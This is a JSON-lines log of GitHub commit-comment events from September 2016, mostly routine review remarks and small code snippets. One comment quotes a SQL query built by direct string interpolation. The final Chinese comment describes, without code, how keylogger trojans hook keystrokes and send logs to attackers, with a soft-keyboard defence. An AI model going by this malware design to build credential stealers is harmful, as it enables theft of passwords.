{"id":"4614348933","type":"CommitCommentEvent","actor":{"login":"Viper2k4"},"repo":{"name":"StoneOffStones/plugin.video.xstream"},"payload":{"comment":{"id":19163768,"position":null,"line":null,"path":null,"commit_id":"03e0434908c28a85e435f5640def84ddd0d59ae8","created_at":"2016-09-25T14:40:07Z","updated_at":"2016-09-25T14:40:07Z","body":"Du sollstest das ggf. ins Issue posten ^^\r\n\r\nAber du scheinst keine aktuelle Version zu testen. Den Bilder und suche gegen eigentlich ^^"}},"created_at":"2016-09-25T14:40:07Z"}
{"id":"4614351723","type":"CommitCommentEvent","actor":{"login":"Namnamseo"},"repo":{"name":"Namnamseo/2016_rne_imagemaker"},"payload":{"comment":{"id":19163769,"position":null,"line":null,"path":null,"commit_id":"1fe0a0c54ea7c9275568539cb4a4d3e1bf940b70","created_at":"2016-09-25T14:42:00Z","updated_at":"2016-09-25T14:42:00Z","body":"This speeds up the whole process in a factor of ~2x."}},"created_at":"2016-09-25T14:42:00Z"}
{"id":"4614352538","type":"CommitCommentEvent","actor":{"login":"cellhunter79"},"repo":{"name":"cellhunter79/test-repo"},"payload":{"comment":{"id":19163771,"position":null,"line":null,"path":null,"commit_id":"aeab3f7614596b331f78d49e6b89ebf021142dbb","created_at":"2016-09-25T14:42:32Z","updated_at":"2016-09-25T14:42:32Z","body":"Test from cellphone \n"}},"created_at":"2016-09-25T14:42:32Z"}
{"id":"4614352695","type":"CommitCommentEvent","actor":{"login":"Charles-Long"},"repo":{"name":"Charles-Long/Android-Learning"},"payload":{"comment":{"id":19163772,"position":null,"line":null,"path":null,"commit_id":"4ff8150aae3cceb43dcd69c34442cc9bd3f8e05e","created_at":"2016-09-25T14:42:39Z","updated_at":"2016-09-25T14:42:39Z","body":"create CriminalIntent"}},"created_at":"2016-09-25T14:42:39Z"}
{"id":"4614354567","type":"CommitCommentEvent","actor":{"login":"raffazizzi"},"repo":{"name":"TEIC/Stylesheets"},"payload":{"comment":{"id":19163773,"position":null,"line":null,"path":null,"commit_id":"f3044b9e37520fd034b27dc792f948a8cb172538","created_at":"2016-09-25T14:43:53Z","updated_at":"2016-09-25T14:43:53Z","body":"I'd think it concatenates it *first* then resolving file:/// or file://// should be equivalent, no?"}},"created_at":"2016-09-25T14:43:53Z"}
{"id":"4614355573","type":"CommitCommentEvent","actor":{"login":"aslam558"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19163774,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-25T14:44:30Z","updated_at":"2016-09-25T14:44:30Z","body":"But it is not working for Drop-downs.Kindly suggest.. Thanks  in Advance.  Regards Aslam Sent from Yahoo Mail on Android On Sat, 24 Sep, 2016 at 11:13 am, varun-k2<notifications@github.com> wrote: Hi @aslam558 , Look for the below which decide the triggering event of plugin. validationEventTrigger: \"blur\", Here you have to add events like keyup keydown wherever you want plugin to validate the form. you can also add this while initializing/attaching the plugin to form."}},"created_at":"2016-09-25T14:44:30Z"}
{"id":"4614356543","type":"CommitCommentEvent","actor":{"login":"NicoliAraujo"},"repo":{"name":"NicoliAraujo/CABuilder"},"payload":{"comment":{"id":19163775,"position":3,"line":3,"path":"README.md","commit_id":"deb94494085073638b880a720d2f12aa8e11a868","created_at":"2016-09-25T14:45:03Z","updated_at":"2016-09-25T14:45:03Z","body":"Vamos comemoraaar"}},"created_at":"2016-09-25T14:45:03Z"}
{"id":"4614357517","type":"CommitCommentEvent","actor":{"login":"knolleary"},"repo":{"name":"node-red/node-red"},"payload":{"comment":{"id":19163776,"position":null,"line":null,"path":null,"commit_id":"a89c7b1a70cc2818664797d634d7e862d14520f5","created_at":"2016-09-25T14:45:39Z","updated_at":"2016-09-25T14:45:39Z","body":"When did 'path' become a verb?"}},"created_at":"2016-09-25T14:45:39Z"}
{"id":"4614357941","type":"CommitCommentEvent","actor":{"login":"gangstara2"},"repo":{"name":"gangstara2/hanu-project"},"payload":{"comment":{"id":19163777,"position":null,"line":null,"path":null,"commit_id":"9dfe1f93864f6fefdc4f5b514577b676ef5efdb4","created_at":"2016-09-25T14:45:55Z","updated_at":"2016-09-25T14:45:55Z","body":"> SELECT company.com_name, product.* FROM product\r\n +        INNER JOIN company\r\n +        ON product.company_id=company.id\r\n +        WHERE product.title LIKE '$value' OR company.com_name LIKE '$value' OR product.detail LIKE '$value' OR product.sale LIKE '$value' OR product.price LIKE '$value' OR product.type LIKE '$value' OR product.tags LIKE '$value'\";\r\n\r\ncái INNER JOIN nên thay bằng LEFT JOIN để lấy hết được data có thể từ bảng product hoặc dùng FULL OUTER JOIN để search & lấy đc hết các bảng nhé\r\n"}},"created_at":"2016-09-25T14:45:55Z"}
{"id":"4614363795","type":"CommitCommentEvent","actor":{"login":"coorg"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19163779,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-25T14:49:41Z","updated_at":"2016-09-25T14:49:41Z","body":"hmmm, that didn't seem to work either. \r\n\r\n![image](https://cloud.githubusercontent.com/assets/1631739/18816003/c227b06a-830d-11e6-9480-47c13bb937d4.png)\r\n\r\n\r\n"}},"created_at":"2016-09-25T14:49:41Z"}
{"id":"4614364145","type":"CommitCommentEvent","actor":{"login":"dietmarw"},"repo":{"name":"denistwo/FeedDriveLibrary"},"payload":{"comment":{"id":19163780,"position":null,"line":null,"path":null,"commit_id":"841be9b322c6deea64ee2f5b71bccf79b5812185","created_at":"2016-09-25T14:49:57Z","updated_at":"2016-09-25T14:49:57Z","body":"Some comments: \r\n\r\n- You added `&Ouml;` but forgot to remove Ö. Also there are other umlauts in the library\r\n- As I told earlier you can not command other people what license to put their modification on. You can state what license YOUR code is under which then normally (as is the case of MIT) tells then also what derivative can be placed under.\r\n- Just as a tip. If you put the issue number in the commit message like \"Fixes #3\" then Github will pick this up and also automatically mention your commit in the respective ticket and in case of \"fixes\" also close the ticket automatically."}},"created_at":"2016-09-25T14:49:57Z"}
{"id":"4614364326","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"MakerTim/LuckPermsUI"},"payload":{"comment":{"id":19163781,"position":null,"line":null,"path":null,"commit_id":"b2bc22cf1378f9f67d71af5a05c2b93b5350ba48","created_at":"2016-09-25T14:50:05Z","updated_at":"2016-09-25T14:50:05Z","body":"It's done by the maven-jar-plugin :)"}},"created_at":"2016-09-25T14:50:05Z"}
{"id":"4614364931","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"MakerTim/LuckPermsUI"},"payload":{"comment":{"id":19163782,"position":null,"line":null,"path":null,"commit_id":"b2bc22cf1378f9f67d71af5a05c2b93b5350ba48","created_at":"2016-09-25T14:50:28Z","updated_at":"2016-09-25T14:50:28Z","body":"Look: https://github.com/MakerTim/LuckPermsUI/blob/master/pom.xml#L57"}},"created_at":"2016-09-25T14:50:28Z"}
{"id":"4614365831","type":"CommitCommentEvent","actor":{"login":"mortont"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19163783,"position":null,"line":null,"path":null,"commit_id":"243c9b8f382502c0dfcac5100c387a7a44491d1d","created_at":"2016-09-25T14:51:04Z","updated_at":"2016-09-25T14:51:04Z","body":"@rockyrmit all this does is initialize the generation waveform with a given audio file, as an attempt to generate more realistic audio. Without the waveform seed, it will start with a single random value to generate the waveform, which could cause the generation to not sound realistic since the receptive field of the waveform is empty (except for that value). This fills the input window (and by extension, the receptive field) with valid audio so that the generation will have a better chance of generating valid audio to start.\r\n\r\nThe command line for the input is `--wav-seed` followed by any speech .wav file from the corpus or otherwise.\r\n\r\nHope that answered any questions you may have had!"}},"created_at":"2016-09-25T14:51:04Z"}
{"id":"4614370613","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19163787,"position":18,"line":1716,"path":"src/psl.c","commit_id":"32543dd5a507a10eb2dae9b1b7092c77965f6486","created_at":"2016-09-25T14:54:22Z","updated_at":"2016-09-25T14:54:22Z","body":"Now we don't need `resbuf` at all :)\r\nJust let `u8_tolower` do the allocation itself every time."}},"created_at":"2016-09-25T14:54:22Z"}
{"id":"4614372792","type":"CommitCommentEvent","actor":{"login":"coke11"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19163791,"position":null,"line":null,"path":null,"commit_id":"b060edef6090b805a4220f37081bb895109e1da0","created_at":"2016-09-25T14:55:46Z","updated_at":"2016-09-25T14:55:46Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Problem with Github README.md](https://trello.com/c/0zVzhW3U/194-problem-with-github-readme-md)"}},"created_at":"2016-09-25T14:55:46Z"}
{"id":"4614373163","type":"CommitCommentEvent","actor":{"login":"coke11"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19163792,"position":null,"line":null,"path":null,"commit_id":"b060edef6090b805a4220f37081bb895109e1da0","created_at":"2016-09-25T14:56:02Z","updated_at":"2016-09-25T14:56:02Z","body":"Example of problem right there in ticket"}},"created_at":"2016-09-25T14:56:02Z"}
{"id":"4614373435","type":"CommitCommentEvent","actor":{"login":"coke11"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19163793,"position":null,"line":null,"path":null,"commit_id":"b060edef6090b805a4220f37081bb895109e1da0","created_at":"2016-09-25T14:56:13Z","updated_at":"2016-09-25T14:56:13Z","body":"All that was done was the number was changed"}},"created_at":"2016-09-25T14:56:13Z"}
{"id":"4614377689","type":"CommitCommentEvent","actor":{"login":"ekeeke"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19163799,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-25T14:59:06Z","updated_at":"2016-09-25T14:59:06Z","body":"It works here.\r\n\r\n![inputoptions1](https://cloud.githubusercontent.com/assets/717091/18816048/4ad6c706-8341-11e6-955d-0e309e96a47c.png)\r\n![inputoptions2](https://cloud.githubusercontent.com/assets/717091/18816049/4ad7138c-8341-11e6-9797-aefa75d71551.png)\r\n\r\n![retroarch-0925-165523](https://cloud.githubusercontent.com/assets/717091/18816040/fabef41e-8340-11e6-8194-0782e2061b3f.png)\r\n"}},"created_at":"2016-09-25T14:59:06Z"}
{"id":"4614378117","type":"CommitCommentEvent","actor":{"login":"Angelyss"},"repo":{"name":"Enerdy/DiscordBridge"},"payload":{"comment":{"id":19163801,"position":null,"line":null,"path":null,"commit_id":"e12afc6b4a434d05cba41d14c58742baae2d9164","created_at":"2016-09-25T14:59:22Z","updated_at":"2016-09-25T14:59:22Z","body":"![freyja2](https://cloud.githubusercontent.com/assets/14846414/18816050/98c7d4be-8373-11e6-9833-2ccb64aa684b.jpg)\r\nThat was fast\r\n\r\nGood job ( ＾◡＾)"}},"created_at":"2016-09-25T14:59:22Z"}
{"id":"4614378392","type":"CommitCommentEvent","actor":{"login":"syuilo"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":19163802,"position":null,"line":null,"path":null,"commit_id":"3a77c142575f168d552acb0e0298946dbb41e9c1","created_at":"2016-09-25T14:59:33Z","updated_at":"2016-09-25T14:59:33Z","body":"Thanks"}},"created_at":"2016-09-25T14:59:33Z"}
{"id":"4614379483","type":"CommitCommentEvent","actor":{"login":"smokR-spr"},"repo":{"name":"TheMathematicians/physio-app"},"payload":{"comment":{"id":19163806,"position":2,"line":1,"path":"src/app/registration/partial-registration.jade","commit_id":"4a3deaa46f0acd02bd80af0d4b46a21b64d94ad3","created_at":"2016-09-25T15:00:16Z","updated_at":"2016-09-25T15:00:16Z","body":"Refer [ARIA HTML5 role](https://www.w3.org/TR/html-aria/)"}},"created_at":"2016-09-25T15:00:16Z"}
{"id":"4614380094","type":"CommitCommentEvent","actor":{"login":"NaturalmotionStudios"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19163809,"position":null,"line":null,"path":null,"commit_id":"b060edef6090b805a4220f37081bb895109e1da0","created_at":"2016-09-25T15:00:37Z","updated_at":"2016-09-25T15:00:37Z","body":"Yeah"}},"created_at":"2016-09-25T15:00:37Z"}
{"id":"4614380604","type":"CommitCommentEvent","actor":{"login":"raffazizzi"},"repo":{"name":"TEIC/Stylesheets"},"payload":{"comment":{"id":19163810,"position":null,"line":null,"path":null,"commit_id":"f3044b9e37520fd034b27dc792f948a8cb172538","created_at":"2016-09-25T15:00:55Z","updated_at":"2016-09-25T15:00:55Z","body":"Tested. It needs to be 'file:///'. Will merge to dev and push"}},"created_at":"2016-09-25T15:00:55Z"}
{"id":"4614381747","type":"CommitCommentEvent","actor":{"login":"Tian-quan"},"repo":{"name":"Tian-quan/IdeaTest"},"payload":{"comment":{"id":19163814,"position":4,"line":15,"path":"src/cn/stq/Main.java","commit_id":"1d1b9189b247c813f20b8cd204bbe8f1ca3b356f","created_at":"2016-09-25T15:01:40Z","updated_at":"2016-09-25T15:01:40Z","body":"//啊实打实"}},"created_at":"2016-09-25T15:01:40Z"}
{"id":"4614382931","type":"CommitCommentEvent","actor":{"login":"gggeek"},"repo":{"name":"kaliop-uk/ezmigrationbundle"},"payload":{"comment":{"id":19163816,"position":12,"line":63,"path":"Core/API/Managers/ContentTypeManager.php","commit_id":"1c00e45fb7c04e1f9d0a6b08d059547c634859d2","created_at":"2016-09-25T15:02:25Z","updated_at":"2016-09-25T15:02:25Z","body":"ugly leftover, should not be here..."}},"created_at":"2016-09-25T15:02:25Z"}
{"id":"4614384312","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19163817,"position":null,"line":null,"path":null,"commit_id":"3367c4a6ef81d42be665dbc36177b75a937cf262","created_at":"2016-09-25T15:03:20Z","updated_at":"2016-09-25T15:03:20Z","body":"@KairusDarkSeeker I don't know anymore but I guess we shouldn't use a Callable Task since it is deprecated.\r\nI think there's a reason why this feature is deprecated."}},"created_at":"2016-09-25T15:03:20Z"}
{"id":"4614385820","type":"CommitCommentEvent","actor":{"login":"Guozhongzhi"},"repo":{"name":"Guozhongzhi/computational_physics_N2014301020087"},"payload":{"comment":{"id":19163826,"position":1,"line":1,"path":"Materials","commit_id":"a6dad015097789c1a261c3f10f5074f5a6611798","created_at":"2016-09-25T15:04:19Z","updated_at":"2016-09-25T15:04:19Z","body":"```python\r\n#The code of Exercise_03_L1\r\nimport os\r\nimport time\r\ni=os.system('cls')\r\nl0 = \" # # # #              # # # # #  #                        # # # # #  #      #\"\r\nl1 = \"#                           #    #                              #    #\"\r\nl2 = \"#    ### #   #  # #       #      # # #   # #   # #   # #      #      # # #  #\"\r\nl3 = \"#      # #   # #   #    #        #   #  #   # #   # #  #    #        #   #  #\"\r\nl4 = \" # # # #  # #   # #   # # # # #  #   #   # #  #   #  # #  # # # # #  #   #  #\"\r\nl5 = \"                                                       #\"\r\nl6 = \"                                                    # #\"\r\nL = [l0, l1, l2, l3, l4, l5, l6, ]\r\nb = 0\r\nwhile b < 10:\r\n    b = b + 1\r\n    for i in L:\r\n        print '    ' * b + i\r\n    time.sleep(0.5)\r\n    i=os.system('cls')\r\n\r\n```"}},"created_at":"2016-09-25T15:04:19Z"}
{"id":"4614386239","type":"CommitCommentEvent","actor":{"login":"Namnamseo"},"repo":{"name":"Namnamseo/2016_rne_imagemaker"},"payload":{"comment":{"id":19163827,"position":null,"line":null,"path":null,"commit_id":"1fe0a0c54ea7c9275568539cb4a4d3e1bf940b70","created_at":"2016-09-25T15:04:33Z","updated_at":"2016-09-25T15:04:33Z","body":"The performance improvement can be accounted for by various reasons.\r\n\r\n* Multithreading in Python, though it may not seem intuitive, is not really effective; global interpreter lock keeps the process from effectively utilizing multiple CPUs & cores. Read [here](http://stackoverflow.com/questions/3044580/multiprocessing-vs-threading-python).\r\n* Threads within a process share I/O scheduling. In this case, the job is considerably I/O-exhausting, and I/O might have been a bottleneck."}},"created_at":"2016-09-25T15:04:33Z"}
{"id":"4614387442","type":"CommitCommentEvent","actor":{"login":"catdad"},"repo":{"name":"catdad/grandma"},"payload":{"comment":{"id":19163830,"position":null,"line":null,"path":null,"commit_id":"86dd71ac47561e52f6fef41aa686a459894f6405","created_at":"2016-09-25T15:05:18Z","updated_at":"2016-09-25T15:05:18Z","body":"#86 "}},"created_at":"2016-09-25T15:05:18Z"}
{"id":"4614389273","type":"CommitCommentEvent","actor":{"login":"Guozhongzhi"},"repo":{"name":"Guozhongzhi/computational_physics_N2014301020087"},"payload":{"comment":{"id":19163835,"position":1,"line":1,"path":"Materials","commit_id":"a6dad015097789c1a261c3f10f5074f5a6611798","created_at":"2016-09-25T15:06:24Z","updated_at":"2016-09-25T15:06:24Z","body":"```python\r\n#The code of Exercise_03_L2 \r\nimport os,time\r\nn = 0\r\nwhile n in range(100):\r\n    print('            *             ')\r\n    print('            *             ')\r\n    print('            *             ')\r\n    print('            *             ')\r\n    print('*  *  *  *  *  *  *  *  * ')\r\n    print('            *             ')\r\n    print('            *             ')\r\n    print('            *             ')\r\n    print('            *             ')\r\n    time.sleep(0.05)\r\n    i=os.system('cls')\r\n    i\r\n    print('    *               *     ')\r\n    print('      *           *       ')\r\n    print('        *       *         ')\r\n    print('          *   *           ')\r\n    print('            *             ')\r\n    print('          *   *           ')\r\n    print('        *       *         ')\r\n    print('      *           *       ')\r\n    print('    *               *     ')\r\n    time.sleep(0.05)\r\n    i=os.system('cls')\r\n    i\r\n    n = n + 1\r\n```"}},"created_at":"2016-09-25T15:06:24Z"}
{"id":"4614389533","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":19163836,"position":null,"line":null,"path":null,"commit_id":"92539796dea8477a92595ef7fc4f20f622657f0d","created_at":"2016-09-25T15:06:35Z","updated_at":"2016-09-25T15:06:35Z","body":"To PRO."}},"created_at":"2016-09-25T15:06:35Z"}
{"id":"4614390756","type":"CommitCommentEvent","actor":{"login":"gggeek"},"repo":{"name":"kaliop-uk/ezmigrationbundle"},"payload":{"comment":{"id":19163838,"position":36,"line":136,"path":"Core/API/Managers/LocationManager.php","commit_id":"2bffa4d21697f4cf42954259f07c2b181d73a056","created_at":"2016-09-25T15:07:24Z","updated_at":"2016-09-25T15:07:24Z","body":"I am not sure that setting sections to Locations is the best idea, since sections are assigned to Contents..."}},"created_at":"2016-09-25T15:07:24Z"}
{"id":"4614392189","type":"CommitCommentEvent","actor":{"login":"gareth"},"repo":{"name":"hashicorp/vault"},"payload":{"comment":{"id":19163840,"position":null,"line":null,"path":null,"commit_id":"207d16bf8bfa15af807176af696c2cb61c769fb3","created_at":"2016-09-25T15:08:20Z","updated_at":"2016-09-25T15:08:20Z","body":"I'm starting to learn about `vault`, and I understand why this update happened, but it does break the instructions at https://www.vaultproject.io/intro/getting-started/authentication.html:\r\n\r\n```\r\nError making API request.\r\n\r\nURL: PUT http://0.0.0.0:32770/v1/auth/github/login\r\nCode: 400. Errors:\r\n\r\n* authentication backends cannot create root tokens\r\n```\r\n\r\nIs there a simple update that can be made to that page too?"}},"created_at":"2016-09-25T15:08:20Z"}
{"id":"4614395649","type":"CommitCommentEvent","actor":{"login":"aloscha"},"repo":{"name":"StarcounterSamples/Chatter"},"payload":{"comment":{"id":19163845,"position":12,"line":34,"path":"ViewModels/ChatGroupPage.json.cs","commit_id":"aee69f94620917ddf892973dc5aedfd9ea418ac2","created_at":"2016-09-25T15:10:34Z","updated_at":"2016-09-25T15:10:34Z","body":"please use here c#-naming `chatMessageKey` - small `c`"}},"created_at":"2016-09-25T15:10:34Z"}
{"id":"4614396555","type":"CommitCommentEvent","actor":{"login":"javierri"},"repo":{"name":"cruz254/ejercicios"},"payload":{"comment":{"id":19163848,"position":null,"line":null,"path":null,"commit_id":"f6f0e68782dcf4aa38f5c764bf676712926d906a","created_at":"2016-09-25T15:11:11Z","updated_at":"2016-09-25T15:11:11Z","body":"Bien por la correción de la condición en el while del metodo de elementos consecutivos.. pero el ejercicio ya fue evaluado."}},"created_at":"2016-09-25T15:11:11Z"}
{"id":"4614398197","type":"CommitCommentEvent","actor":{"login":"ericsagnes"},"repo":{"name":"kametaro/nixosPresentation"},"payload":{"comment":{"id":19163855,"position":80,"line":80,"path":"nixos-2016-09-tsuji/source.markdown","commit_id":"ab3867eae1be543fbbd48569c59717a9b46f49ea","created_at":"2016-09-25T15:12:20Z","updated_at":"2016-09-25T15:12:20Z","body":"/insall/install/"}},"created_at":"2016-09-25T15:12:20Z"}
{"id":"4614398706","type":"CommitCommentEvent","actor":{"login":"tadger"},"repo":{"name":"atevington/LunchWave"},"payload":{"comment":{"id":19163857,"position":null,"line":null,"path":null,"commit_id":"3dc08869f7913d5147925d77c1019317d028c91f","created_at":"2016-09-25T15:12:41Z","updated_at":"2016-09-25T15:12:41Z","body":"Port is 3000. This is the Webpack dev server port serving up the client content, eg.: transpiled es6"}},"created_at":"2016-09-25T15:12:41Z"}
{"id":"4614399277","type":"CommitCommentEvent","actor":{"login":"aloscha"},"repo":{"name":"StarcounterSamples/Chatter"},"payload":{"comment":{"id":19163861,"position":17,"line":39,"path":"ViewModels/ChatGroupPage.json.cs","commit_id":"aee69f94620917ddf892973dc5aedfd9ea418ac2","created_at":"2016-09-25T15:13:02Z","updated_at":"2016-09-25T15:13:02Z","body":"Please use null-propagation - `master?.CurrentPage`"}},"created_at":"2016-09-25T15:13:02Z"}
{"id":"4614399841","type":"CommitCommentEvent","actor":{"login":"tadger"},"repo":{"name":"atevington/LunchWave"},"payload":{"comment":{"id":19163862,"position":null,"line":null,"path":null,"commit_id":"3dc08869f7913d5147925d77c1019317d028c91f","created_at":"2016-09-25T15:13:24Z","updated_at":"2016-09-25T15:13:24Z","body":"All API requests are proxies to 3001, see webpack.server.js"}},"created_at":"2016-09-25T15:13:24Z"}
{"id":"4614400098","type":"CommitCommentEvent","actor":{"login":"tadger"},"repo":{"name":"atevington/LunchWave"},"payload":{"comment":{"id":19163863,"position":null,"line":null,"path":null,"commit_id":"3dc08869f7913d5147925d77c1019317d028c91f","created_at":"2016-09-25T15:13:35Z","updated_at":"2016-09-25T15:13:35Z","body":"Proxied*"}},"created_at":"2016-09-25T15:13:35Z"}
{"id":"4614400326","type":"CommitCommentEvent","actor":{"login":"Namnamseo"},"repo":{"name":"Namnamseo/2016_rne_imagemaker"},"payload":{"comment":{"id":19163864,"position":null,"line":null,"path":null,"commit_id":"1fe0a0c54ea7c9275568539cb4a4d3e1bf940b70","created_at":"2016-09-25T15:13:45Z","updated_at":"2016-09-25T15:13:45Z","body":"However, here are some warnings:\r\n\r\n* Each process will be passed the corpus, which is a considerably large blob. This can be improved, by sampling the corpus before the process dispatch. This is TODO.\r\n* Each process will have to load the same truetype font file. It seems each ImageFont object has a file handle looking at the font file, and loading glyphs only when we need it. *(It lazily loads the glyph, but I'm not sure if it's using a handle. As it would be unnecessarily expensive if we open and close the file each time we need it, I strongly suggest this is the case. TODO: Refer to Pillow code.)* This can be seen unnecessary compared to multithreading where they share the memory space. But then again the font object can be used by only one thread. Here's a tradeoff unveiled.\r\n* Writing the image may work out as to be the bottleneck.\r\n* After all, spawning new bare process is expensive, and the result here seems to suggest that pros outran cons for now."}},"created_at":"2016-09-25T15:13:45Z"}
{"id":"4614401066","type":"CommitCommentEvent","actor":{"login":"gauravsars"},"repo":{"name":"gauravsars/UIDesignGym"},"payload":{"comment":{"id":19163865,"position":null,"line":null,"path":null,"commit_id":"0bf4dff455344903a31a02e9c5bee3401ae78922","created_at":"2016-09-25T15:14:15Z","updated_at":"2016-09-25T15:14:15Z","body":"problems at this point of revision....\r\n\r\n1. spacing between html and body tag.\r\nlike html tag abd body tag should have same margin padding and border properties."}},"created_at":"2016-09-25T15:14:15Z"}
{"id":"4614410555","type":"CommitCommentEvent","actor":{"login":"ButQingMei"},"repo":{"name":"ButQingMei/MyViewGroup"},"payload":{"comment":{"id":19163876,"position":null,"line":null,"path":null,"commit_id":"2912bd2328d30db4be979999b04f14b0ddfa5d70","created_at":"2016-09-25T15:19:58Z","updated_at":"2016-09-25T15:19:58Z","body":"这里面放的是有时候看到的好玩的自定义view，于是尝试写的小demo，大部分没有实际价值~\r\n因为太难的我不会写 =  = ..."}},"created_at":"2016-09-25T15:19:58Z"}
{"id":"4614411117","type":"CommitCommentEvent","actor":{"login":"Monsterze"},"repo":{"name":"Monsterze/ns"},"payload":{"comment":{"id":19163878,"position":null,"line":null,"path":null,"commit_id":"98dac700c4ab14fb5366f58a0ce0fe53780cd573","created_at":"2016-09-25T15:20:18Z","updated_at":"2016-09-25T15:20:18Z","body":"物理键盘的内部有一块微处理器，它控制着键盘的全部工作，比如主机加电时键盘的自检、扫描，扫描码的缓冲以及与主机的通讯等等。当一个键被按下时，微处理器便根据其位置，将字符信号转换成二进制码，传给主机和显示器。如果操作人员的输入速度很快或CPU正在进行其它的工作，就先将键入的内容送往内存中的键盘缓冲区，等CPU空闲时再从缓冲区中取出暂存的指令分析并执行。\r\n而一般键盘记录间谍软件有三个模块组成：主模块，钩子过程模块以及FTP模块。\r\n按键记录木马是Trojans木马的变种之一。是功能比较单一的特洛伊木马。攻击者会力图使它保持较小的体积，通常是10 KB  到30 KB，以便快速激活而不引起注意。该木马由3个模块组成：主模块，钩子过程和ftp模块。主模块负责安装一个全局钩子过 程。该钩子的任务是把每次按键事件向主模块汇报，由主模块把所有的击键保存到一个文件中。当记录文件达到预定的大小时，主模块命令ftp模块把记录文件上载给一个n甲服务器。三个模块问的通讯是通过Windows消息机制实现的。\r\n一旦用户的电脑感染了按键记录木马病毒。系统就被种下了“钩子”，黑客通过“钩子”程序监听和记录用户的击键动作，然后通过自身的邮件发送模块把记录下的密码发送到黑客的指定邮箱。\r\n  比较典型的案例如“密码大盗”。“密码大盗”病毒运行后。在被感染的计算机上释放下列四个文件：用来记录病毒原始目录的文 件mmdat．dat、病毒主程序intrenat．exe、钩子模块ntdll32．dll和记录用户输入数据的文件wdata32．dU。病毒运行后安装钩子模块，子类\r\n化IE服务器窗口(Iutemet Explorer_Server)，当发现网贞上有“Password”、“密码”、“Submit”等字符时开始记录用户输入信息．并将记录的用户信息发往指定邮箱。\r\n 为对付按键记录木马，密码输入中目前普遍采用的方法就是软键盘输入。软键盘输人可反击基于钩子技术的键盘监视程序。该 技术方便易用．兼容性强，因此受到了广大用户的欢迎。\r\n软键盘技术的工作原理是利用一个软件程序模拟实现硬键盘所具备的功能。在软键盘内部有一个编辑控件。用此编辑控件将 针对每次用户击键譬成一个模拟的随机键击串。木马的监视程序将截获用户的击键和伪击键，这样一来木马的键击记录器就无法 提取记录随机产生的相对应按键，使它很难或者不可能检索实际的输入文本。因此只要不直接通过键盘输入，而用软键盘输入，木 马软件就无法获得每个按键的ID，也就起到了动态隐藏密码的效果，随机键击串麻该是一个乱数，也就会有效地阻止键击记录器获 取信息的途径。而用户输入的数据被存储于～个成员变量中。应用程序就可以很容易地通过编辑控件存取该变量的值，从而能够防止木马窃取密码的事情发生。\r\n软键盘输入技术使得用按键记录技术的木马失去了作用，但“屏幕快照”窃密木马却可以通过屏幕快照的方法来破解软键盘输入技术。“屏幕快照”窃密木马一般会伪装成后缀名为rar的压缩艾件，诱骗用户上当点击运行。“屏幕快照”窃密木马运行后，会将其中部分网页链接改造成可偷偷打开黑客事先设定的恶意网页的“陷阱”链接，然后自行利用各种IE浏览器的MHT漏洞尝试对点击者的计算机进行木马种植．2004年江民反病毒中心截获的“证券大盗”病毒、2008年1月14日围家计算机病毒应急处理中心发布通告的一个以盗取网上银行和“支付宝”账号密码的“网银木马”，都是使用“屏幕快照”窃密技术的木马案例。\r\n“证券大盗”木马病毒运行时，会自动查找包括IE、Maxthon、Trraveler、MYIE、TouchNet、Opera、SmartExplore、k—meleon、GreenBrowser在内的多种浏览器，或寻找一些包含著名券商名称的窗口标题．一旦发现用户使用其中任一种浏览器臀录个人网上银行等界面．就开始启动键盘钩子对用户瞀录信息进行记录，包括用户名和密码。同时在后台以复制的方式将屏幕分为黑、白两种图片。其中软键盘界面为黑色图片，是固定不动，其后通过屏幕快照的方式在一段时间内进行连续截屏．记录每一次鼠标点击的位置．将用户的登录界面保存为多张白色图片，一般存放于：“c：、Screenl．bmp”和“C：＼-Screen2．bmp”下。当记录达到指定次数后．木马病毒会将存档中记录的信息和图片通过电子邮件发送到黑客自己的邮箱中。发送成功后，木马病毒还会实施自杀，将自身删除。黑客通过对照图片中鼠标的点击位置．就很有可能破译出用户的登录账号和密码，从而突破软键盘密码保护技术。（何太星 \"证券大盗\"木马病毒原理及防范[期刊论文]-计算机安全 2005(3)）\r\n 软键盘改进：将原始的“静态”软键盘模型改进成“动态”的软键盘模型，每当用户利用软键盘点击输入一个数据的同时．键盘上所有按键的显示内容自动隐藏，随后出现的软键盘上所有的按键是随机出现的新的顺序，这种变换过程本身完全随机、无规律町寻，这就可以有效防止密码的失窃。\r\n具体实现选用VB来编写设计软键盘程序。弯用户鼠标指向软键盘上某个键位时，则所有按钮上的内容不显示：当用户击点键位后松开鼠标时，则更换所有按钮上的内容。采用这样的软键盘设计的好处有：一是软键盘的键位随着每次的按键而改变．可有效防止采用黑白片方案的窃密手段：二是软键盘在指向按键的同时隐藏键位的内容，可有效阻止按键截屏的窃密手段。运用动态软键盘设计的不足之处：键位更换应当采用完全点击时软键盘状态随机形式，以增强安全性。但如果每按一个键位后．布局就进行一次完全变换，则可能造成用户的使用不便。"}},"created_at":"2016-09-25T15:20:18Z"}
